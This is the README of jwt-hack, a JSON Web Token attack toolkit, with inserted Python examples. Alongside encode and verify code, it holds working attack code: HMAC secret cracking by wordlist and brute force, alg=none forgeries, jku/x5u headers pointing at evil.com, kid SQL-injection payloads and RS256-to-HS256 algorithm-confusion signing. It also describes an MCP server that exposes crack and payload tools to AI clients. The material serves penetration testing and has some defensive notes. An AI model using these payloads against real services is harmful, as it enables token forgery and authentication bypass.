
hahwul/jwt-hack


JSON Web Token Hack Toolkit


A high-performance toolkit for testing, analyzing and attacking JSON Web Tokens.

Installation

Cargo

cargo install jwt-hack

Homebrew

brew install jwt-hack

Snapcraft (Ubuntu)

sudo snap install jwt-hack

From source

git clone https://github.com/hahwul/jwt-hack
cd jwt-hack
cargo install --path .

Docker images

GHCR

docker pull ghcr.io/hahwul/jwt-hack:latest

Docker Hub

docker pull hahwul/jwt-hack:v2.2.0

Features

| Mode    | Description                   | Support |
|---------|-------------------------------|---------|
| Encode  | JWT/JWE Encoder               | Secret based / Key based / Algorithm / Custom Header / DEFLATE Compression / JWE |
| Decode  | JWT/JWE Decoder               | Algorithm, Issued At Check, DEFLATE Compression, JWE Structure |
| Verify  | JWT Verifier                  | Secret based / Key based (for asymmetric algorithms) |
| Crack   | Secret Cracker                | Dictionary Attack / Brute Force / DEFLATE Compression |
| Payload | JWT Attack Payload Generator  | none / jku&x5u / alg_confusion / kid_sql / x5c / cty |
| MCP     | Model Context Protocol Server | AI model integration via standardized protocol |

Basic Usage

Decode a JWT

You can decode both regular and DEFLATE-compressed JWTs. The tool will automatically detect and decompress compressed tokens.

jwt-hack decode eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0In0.CHANGED
jwt-hack decode COMPRESSED_JWT_TOKEN

Decode a JWE

Decode JWE (JSON Web Encryption) tokens to analyze their structure. The tool automatically detects JWE format (5 parts) and displays the encryption details.

# Decode JWE token structure
jwt-hack decode eyJhbGciOiJkaXIiLCJlbmMiOiJBMjU2R0NNIn0..ZHVtbXlfaXZfMTIzNDU2.eyJ0ZXN0IjoiandlIn0.ZHVtbXlfdGFn

# Shows JWE header, encrypted key, IV, ciphertext, and authentication tag
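The two decode commands above differ only in how many dot-separated segments the input has and in whether the payload is DEFLATE-compressed. The following is an added example, not jwt-hack's own code, that shows what such a decoder has to do: split the compact serialization, classify it as JWS (3 segments) or JWE (5 segments), base64url-decode each part, and inflate a compressed payload. How jwt-hack itself detects compression is not documented on this page; the example assumes a compressed payload either carries a `"zip": "DEF"` header or is raw DEFLATE data that does not parse as JSON. The sample tokens are the two shown above plus one constructed by hand.

```python
import base64
import json
import zlib


def b64url_decode(segment: str) -> bytes:
    """Base64url without padding, as used by JWT/JWE compact serialization."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def inflate_payload(raw: bytes, header: dict) -> tuple:
    """Return (payload_bytes, was_compressed).

    Assumption, not taken from jwt-hack: a compressed payload either announces
    itself with "zip": "DEF" in the header or is raw DEFLATE data that does
    not parse as JSON. Anything that already parses is returned untouched.
    """
    if header.get("zip") == "DEF":
        return zlib.decompress(raw, -zlib.MAX_WBITS), True
    try:
        json.loads(raw)
        return raw, False
    except ValueError:  # UnicodeDecodeError and JSONDecodeError are both ValueError
        try:
            return zlib.decompress(raw, -zlib.MAX_WBITS), True
        except zlib.error:
            return raw, False


def decode_token(token: str) -> dict:
    """Split a compact-serialized token and classify it by segment count."""
    parts = token.split(".")
    header = json.loads(b64url_decode(parts[0]))
    if len(parts) == 5:
        # JWE: header.encrypted_key.iv.ciphertext.tag (RFC 7516)
        names = ("encrypted_key", "iv", "ciphertext", "tag")
        return {"kind": "JWE", "header": header,
                **{n: b64url_decode(p) for n, p in zip(names, parts[1:])}}
    if len(parts) == 3:
        # JWS: header.payload.signature (RFC 7515)
        payload, compressed = inflate_payload(b64url_decode(parts[1]), header)
        return {"kind": "JWS", "header": header, "payload": json.loads(payload),
                "compressed": compressed, "signature": b64url_decode(parts[2])}
    raise ValueError(f"expected 3 (JWS) or 5 (JWE) segments, got {len(parts)}")


# Constructed samples. The first two are the tokens shown above; the third is a
# hand-built token whose payload is a single stored (BTYPE=00) raw DEFLATE
# block wrapping {"sub":"1234"}, with a dummy signature and no "zip" header,
# so detection has to fall back to trying to inflate.
SAMPLES = {
    "jws": "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0In0.CHANGED",
    "jwe": "eyJhbGciOiJkaXIiLCJlbmMiOiJBMjU2R0NNIn0..ZHVtbXlfaXZfMTIzNDU2.eyJ0ZXN0IjoiandlIn0.ZHVtbXlfdGFn",
    "jws_deflate": "eyJhbGciOiJIUzI1NiJ9.AQ4A8f97InN1YiI6IjEyMzQifQ.CHANGED",
}

if __name__ == "__main__":
    for name, tok in SAMPLES.items():
        print(name, json.dumps(decode_token(tok), default=bytes.hex))
```

Note that decoding a JWE only exposes its structure: the ciphertext stays opaque without the content-encryption key, which is exactly what the JWE decode output above lists (header, encrypted key, IV, ciphertext, tag).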

Encode a JWT

jwt-hack encode '{"sub":"1234"}' --secret=your-secret

Encode a JWT with DEFLATE Compression

You can use the --compress option to apply DEFLATE compression to the JWT payload.

jwt-hack encode '{"sub":"1234"}' --secret=your-secret --compress

With Private Key

ssh-keygen -t rsa -b 4096 -E SHA256 -m PEM -P "" -f RS256.key
jwt-hack encode '{"a":"z"}' --private-key RS256.key --algorithm=RS256


Encode a JWE

Create JWE (JSON Web Encryption) tokens for testing encrypted JWT scenarios.

# Basic JWE encoding
jwt-hack encode '{"sub":"1234", "data":"encrypted"}' --jwe --secret=your-secret

# JWE tokens are encrypted and can only be decrypted with the proper key
jwt-hack encode '{"sensitive":"data"}' --jwe

Verify a JWT

Checks if a JWT's signature is valid using the provided secret or key.

# With Secret (HMAC algorithms like HS256, HS384, HS512)
jwt-hack verify YOUR_JWT_TOKEN_HERE --secret=your-256-bit-secret

# With Private Key (for asymmetric algorithms like RS256, ES256, EdDSA)
jwt-hack verify YOUR_JWT_TOKEN_HERE --private-key path/to/your/RS256_private.key
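The encode and verify commands above are two halves of the same operation: the signing input is the base64url header and payload joined by a dot, and verification recomputes the MAC over exactly that string. The following is an added example, not jwt-hack's own code, covering the secret-based (HMAC) case for both commands, including `--compress`-style DEFLATE payloads and the `validate_exp` check the MCP `verify` tool exposes. The header layout for a compressed token (`"zip": "DEF"` plus a raw-DEFLATE payload) is an assumption, not something this page documents about jwt-hack.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

HMAC_ALGS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_jwt(claims: dict, secret: str, alg: str = "HS256", compress: bool = False) -> str:
    """HMAC-signed JWT. With compress=True the payload is raw DEFLATE and the
    header announces it with "zip": "DEF" (assumed layout, not jwt-hack's)."""
    header = {"alg": alg, "typ": "JWT"}
    body = json.dumps(claims, separators=(",", ":")).encode()
    if compress:
        header["zip"] = "DEF"
        deflater = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)  # raw DEFLATE, no zlib wrapper
        body = deflater.compress(body) + deflater.flush()
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "." + b64url_encode(body)
    )
    signature = hmac.new(secret.encode(), signing_input.encode(), HMAC_ALGS[alg]).digest()
    return f"{signing_input}.{b64url_encode(signature)}"


def verify_jwt(token: str, secret: str, validate_exp: bool = True, now: float = None) -> dict:
    """Return the claims when the HMAC signature (and, optionally, exp) check
    out; raise ValueError otherwise. The digest comes from an allow-list keyed
    on the header's alg, so a token that merely claims "none" or an RSA alg
    is rejected rather than trusted."""
    try:
        h, p, s = token.split(".")
    except ValueError:
        raise ValueError("not a three-segment JWS") from None
    header = json.loads(b64url_decode(h))
    digest = HMAC_ALGS.get(header.get("alg"))
    if digest is None:
        raise ValueError(f"unsupported or unsafe alg: {header.get('alg')!r}")
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), digest).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):  # constant-time compare
        raise ValueError("bad signature")
    body = b64url_decode(p)
    if header.get("zip") == "DEF":
        body = zlib.decompress(body, -zlib.MAX_WBITS)
    claims = json.loads(body)
    current = now if now is not None else time.time()
    if validate_exp and "exp" in claims and claims["exp"] <= current:
        raise ValueError("token expired")
    return claims


if __name__ == "__main__":
    tok = encode_jwt({"sub": "1234", "exp": int(time.time()) + 300}, "your-secret", compress=True)
    print(tok)
    print(verify_jwt(tok, "your-secret"))
```

The important detail for anyone writing their own verifier is the allow-list on `alg`: the algorithm must be chosen by the verifier's configuration, never taken from the token, otherwise the `none` and algorithm-confusion payloads generated below would be accepted.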

Crack a JWT

Dictionary and brute force attacks also support JWTs compressed with DEFLATE.

# Dictionary attack
jwt-hack crack -w wordlist.txt JWT_TOKEN
jwt-hack crack -w wordlist.txt COMPRESSED_JWT_TOKEN

# Bruteforce attack
jwt-hack crack -m brute JWT_TOKEN --max=4
jwt-hack crack -m brute COMPRESSED_JWT_TOKEN --max=4
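The reason dictionary and brute-force attacks work unchanged on DEFLATE-compressed tokens is that the HMAC covers the header and payload segments exactly as transmitted; the cracker never needs to inflate anything. The following is an added example, not jwt-hack's own code, of both attack modes against an HS256/384/512 token: the digest is chosen from the header, each candidate secret is tried over the same signing input, and brute force walks a character set up to a maximum length (the `--max` idea above). The sample token is a constructed fixture signed with a known secret; its compressed variant uses a hand-built stored raw-DEFLATE block.

```python
import base64
import hashlib
import hmac
import itertools
import json
import string
from typing import Iterable, Optional

HMAC_ALGS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def signing_parts(token: str):
    """Return (signing_input, signature, digest) for an HMAC-signed JWT.

    The MAC covers header and payload exactly as transmitted, so a
    DEFLATE-compressed payload needs no decompression: the cracker recomputes
    the MAC over the same base64url segments the issuer signed.
    """
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg not in HMAC_ALGS:
        raise ValueError(f"{alg!r} is not an HMAC algorithm; nothing to crack")
    return f"{h}.{p}".encode(), b64url_decode(s), HMAC_ALGS[alg]


def crack(token: str, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Return the first candidate whose MAC matches, or None."""
    signing_input, signature, digest = signing_parts(token)
    for secret in candidates:
        if hmac.compare_digest(hmac.new(secret, signing_input, digest).digest(), signature):
            return secret
    return None


def dictionary_candidates(lines: Iterable[str]) -> Iterable[bytes]:
    """One candidate per non-empty wordlist line, newline stripped."""
    for line in lines:
        word = line.rstrip("\r\n")
        if word:
            yield word.encode()


def brute_candidates(chars: str, max_len: int) -> Iterable[bytes]:
    """Every string over `chars` of length 1..max_len, shortest first."""
    alphabet = chars.encode()
    for n in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=n):
            yield bytes(combo)


def crack_dict(token: str, wordlist_lines: Iterable[str]) -> Optional[bytes]:
    return crack(token, dictionary_candidates(wordlist_lines))


def crack_brute(token: str, chars: str = string.ascii_lowercase + string.digits,
                max_len: int = 4) -> Optional[bytes]:
    return crack(token, brute_candidates(chars, max_len))


def make_sample_token(secret: bytes, alg: str = "HS256", compressed: bool = False) -> str:
    """Constructed fixture, not jwt-hack output: sign {"sub":"1234"} with a
    known secret, optionally as a hand-built stored raw-DEFLATE block."""
    header = {"alg": alg, "zip": "DEF"} if compressed else {"alg": alg}
    body = b'\x01\x0e\x00\xf1\xff{"sub":"1234"}' if compressed else b'{"sub":"1234"}'
    signing_input = b64url_encode(json.dumps(header, separators=(",", ":")).encode()) + "." + b64url_encode(body)
    sig = hmac.new(secret, signing_input.encode(), HMAC_ALGS[alg]).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


if __name__ == "__main__":
    target = make_sample_token(b"s3c", "HS512", compressed=True)
    print("dictionary:", crack_dict(target, ["password", "admin", "s3c"]))
    print("brute force:", crack_brute(target, max_len=3))
```

Against a real wordlist, pass the open file: `crack_dict(token, open("wordlist.txt"))`. The candidate generators are lazy, so memory stays flat regardless of wordlist size or character-set length; the cost is purely the number of HMAC computations, which is why a short `--max` matters for brute force.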

Generate payloads

jwt-hack payload JWT_TOKEN --jwk-attack evil.com --jwk-trust trusted.com
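The payload mode takes a real token and emits mutated copies that probe common verification mistakes. The following is an added example, not jwt-hack's own code, of four of the payload families listed in the feature table: `none`, `jku&x5u`, `kid_sql` and `alg_confusion` (`x5c` and `cty` are left out). The exact header values jwt-hack produces are not documented on this page, so every string below is the author's own choice; in particular, the way the `--jwk-trust` host is woven into attacker URLs (assumed here to defeat substring or prefix allow-lists) and the public-key PEM are assumptions, and the PEM is a placeholder rather than a real key.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterator, Optional, Tuple

Payload = Tuple[str, str]  # (label, token)

SAMPLE_TOKEN = "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0In0.CHANGED"  # the token shown earlier
SAMPLE_PUBLIC_KEY_PEM = (  # constructed placeholder; only its exact bytes matter here
    b"-----BEGIN PUBLIC KEY-----\nPLACEHOLDER-NOT-A-REAL-KEY\n-----END PUBLIC KEY-----\n"
)


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def header_of(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[0]))


def _payload_segment(token: str) -> str:
    """The payload exactly as transmitted: re-encoding could change its bytes."""
    return token.split(".")[1]


def _hs256(signing_input: str, secret: bytes) -> bytes:
    return hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()


def _assemble(header: dict, payload_seg: str, secret: Optional[bytes] = None) -> str:
    """Re-serialize the header, keep the payload segment, sign with HS256 when a
    secret is given, otherwise leave the signature empty (for alg=none)."""
    signing_input = f"{b64url_encode(json.dumps(header, separators=(',', ':')).encode())}.{payload_seg}"
    sig = _hs256(signing_input, secret) if secret is not None else b""
    return f"{signing_input}.{b64url_encode(sig)}"


def none_payloads(token: str) -> Iterator[Payload]:
    """alg=none in the spellings that lax, case-insensitive parsers accept."""
    header, p = header_of(token), _payload_segment(token)
    for variant in ("none", "None", "NONE", "nOnE"):
        yield f"none:{variant}", _assemble({**header, "alg": variant}, p)


def jku_x5u_payloads(token: str, attack_host: str, trust_host: str, protocol: str = "https") -> Iterator[Payload]:
    """Key-set URLs pointing at the attacker. Assumption: the trusted host is
    embedded so a substring or prefix allow-list on `trust_host` still passes."""
    header, p = header_of(token), _payload_segment(token)
    urls = (
        f"{protocol}://{attack_host}/jwks.json",
        f"{protocol}://{trust_host}.{attack_host}/jwks.json",
        f"{protocol}://{trust_host}@{attack_host}/jwks.json",
        f"{protocol}://{attack_host}/{trust_host}/jwks.json",
    )
    for claim in ("jku", "x5u"):
        for url in urls:
            yield f"{claim}:{url}", _assemble({**header, claim: url}, p)


def kid_sql_payloads(token: str, chosen_key: bytes = b"AAAA") -> Iterator[Payload]:
    """kid values for a server that looks the key up with SQL: the UNION makes
    the query return a key the attacker chose, so the token is signed with it."""
    header, p = header_of(token), _payload_segment(token)
    key = chosen_key.decode()
    for inj in (f"' UNION SELECT '{key}' -- ", f"x' UNION SELECT '{key}' /*"):
        yield f"kid_sql:{inj}", _assemble({**header, "alg": "HS256", "kid": inj}, p, chosen_key)


def alg_confusion_payloads(token: str, public_key_pem: bytes) -> Iterator[Payload]:
    """RS256 -> HS256 downgrade: sign with the server's own public key as the
    HMAC secret. Several byte-exact variants, because the match must be exact."""
    header, p = header_of(token), _payload_segment(token)
    variants = {
        "pem": public_key_pem,
        "pem_no_trailing_newline": public_key_pem.rstrip(b"\n"),
        "pem_crlf": public_key_pem.replace(b"\n", b"\r\n"),
    }
    for name, secret in variants.items():
        yield f"alg_confusion:{name}", _assemble({**header, "alg": "HS256"}, p, secret)


if __name__ == "__main__":
    for label, tok in (*none_payloads(SAMPLE_TOKEN),
                       *jku_x5u_payloads(SAMPLE_TOKEN, "evil.com", "trusted.com"),
                       *kid_sql_payloads(SAMPLE_TOKEN),
                       *alg_confusion_payloads(SAMPLE_TOKEN, SAMPLE_PUBLIC_KEY_PEM)):
        print(f"{label:55} {tok}")
```

Each generated token is only a probe: a hit is a server that accepts one of them, which then tells you which check is missing (alg allow-list, key-URL allow-list, parameterized `kid` lookup, or a verifier that lets the token pick the algorithm family).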

MCP (Model Context Protocol) Server Mode

jwt-hack can run as an MCP server, allowing AI models to interact with JWT functionality through a standardized protocol.

# Start MCP server (communicates via stdio)
jwt-hack mcp

The MCP server exposes the following tools:

| Tool    | Description               | Parameters |
|---------|---------------------------|------------|
| decode  | Decode JWT tokens         | token (string) |
| encode  | Encode JSON to JWT        | json (string), secret (optional), algorithm (default: HS256), no_signature (boolean) |
| verify  | Verify JWT signatures     | token (string), secret (optional), validate_exp (boolean) |
| crack   | Crack JWT tokens          | token (string), mode (dict/brute), chars (string), max (number) |
| payload | Generate attack payloads  | token (string), target (string), jwk_attack (optional), jwk_protocol (default: https) |

Example MCP Usage

The MCP server is designed to be used by AI models and MCP clients. Each tool accepts JSON parameters and returns structured responses.

Decode Tool:

{
  "name": "decode",
  "arguments": {
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
  }
}

Encode Tool:

{
  "name": "encode",
  "arguments": {
    "json": "{\"sub\":\"1234\",\"name\":\"test\"}",
    "secret": "mysecret",
    "algorithm": "HS256"
  }
}

MCP Client Integration Examples

You can connect jwt-hack’s MCP server to popular MCP-enabled clients. Make sure the jwt-hack binary is on your system and accessible by the client.

VSCode

{
  "servers": {
    "jwt-hack": {
      "type": "stdio",
      "command": "jwt-hack",
      "args": [
        "mcp"
      ]
    }
  },
  "inputs": []
}

Claude Desktop

{
  "mcpServers": {
    "jwt-hack": {
      "command": "jwt-hack",
      "args": ["mcp"],
      "env": {}
    }
  }
}

DEFLATE Compression Support

The jwt-hack toolkit supports DEFLATE compression for JWTs.

  • Use the --compress option with encode to generate compressed JWTs.
  • The decode and crack modes automatically detect and handle compressed JWTs.

Contribute

jwt-hack is an open-source project made with ❤️. If you want to contribute to this project, please see CONTRIBUTING.md and send a pull request with your cool contents.
